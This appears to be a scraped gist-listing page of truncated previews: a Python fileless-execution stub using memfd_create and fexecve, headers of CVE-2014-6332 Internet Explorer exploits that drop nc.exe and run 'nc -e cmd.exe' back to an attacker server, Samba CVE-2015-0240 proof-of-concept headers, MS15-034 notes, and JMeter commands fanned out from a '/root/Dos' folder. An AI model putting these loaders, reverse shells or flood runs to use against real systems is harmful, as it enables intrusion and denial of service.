This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import sys | |
import os | |
import io | |
import argparse | |
import getpass | |
import json | |
sys.path.append('../') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
test |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from ctypes import * | |
c = CDLL("libc.so.6") | |
fd = c.syscall(319,"tempmem",0) | |
c.sendfile(fd,0,0,0x7ffff000) | |
c.fexecve(fd,byref(c_char_p()),byref(c_char_p())) | |
print "fexecve failed" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<!-- | |
CVE-2014-6332 PoC to get meterpreter shell or bypass IE protected mode | |
- Tested on IE11 + Windows 7 64-bit | |
References: | |
- original PoC - http://www.exploit-db.com/exploits/35229/ | |
- http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/ | |
- http://security.coverity.com/blog/2014/Nov/eric-lippert-dissects-cve-2014-6332-a-19-year-old-microsoft-bug.html |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<!-- | |
CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell | |
The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port" | |
'server_ip' and 'server_port' in javascript below determined the connect back target | |
Tested on | |
- IE11 + Windows 7 64-bit (EPM is off) | |
- IE11 + Windoes 8.1 64-bit (EPM is off) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
""" | |
PoC for Samba vulnerabilty (CVE-2015-0240) by sleepya | |
This PoC does only triggering the bug | |
Reference: | |
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/ | |
################# | |
Exploitability against CentOS/Ubuntu binaries |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
""" | |
Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya | |
The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by | |
ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()' | |
in libtalloc does not write a value on 'creds' address. | |
Reference: | |
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
Pseudo code in HTTP.sys to understand flow related to MS15-034 | |
All pseudo code are reversed from vulnerable HTTP.sys on Windows 7 SP1 x86 | |
For anyone want to know what function are patched. | |
Just open patched version and find all functions reference to RtlULongLongAdd(). | |
*/ | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
intervalo=1 | |
info="/sys/class/net/" | |
cd $info | |
for interface in eth* | |
do | |
rx1=`cat $info$interface/statistics/rx_bytes` | |
tx1=`cat $info$interface/statistics/tx_bytes` | |
`sleep $((intervalo))s` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/root/Dos/apache-jmeter-3.1/bin/jmeter -n -t /tmp/0.jmx -l /tmp/0.jtl -Jjmeter.save.saveservice.output_format=xml -Jjmeter.save.saveservice.assertion_results=all -Jjmeter.save.saveservice.bytes=true -Jfile_format.testlog=2.1 -Jjmeter.save.saveservice.response_data.on_error=true -Jjmeter.save.saveservice.thread_counts=true -Jjmeter.save.saveservice.response_data=true -Jjmeter.save.saveservice.samplerData=true -Jjmeter.save.saveservice.requestHeaders=true -Jjmeter.save.saveservice.url=true -Jjmeter.save.saveservice.responseHeaders=true | |
for i in $(cat /usr/local/etc/machines.list );do dsh -m $i "/root/Dos/apache-jmeter-3.1/bin/jmeter -n -t /tmp/test.jmx -l /tmp/test2.jtl -Jjmeter.save.saveservice.output_format=xml -Jjmeter.save.saveservice.assertion_results=all -Jjmeter.save.saveservice.bytes=true -Jfile_format.testlog=2.1 -Jjmeter.save.saveservice.response_data.on_error=true -Jjmeter.save.saveservice.thread_counts=true -Jjmeter.save.saveservice.response_data=true -Jjmeter.save.saveservice.samplerData=true -Jj |
OlderNewer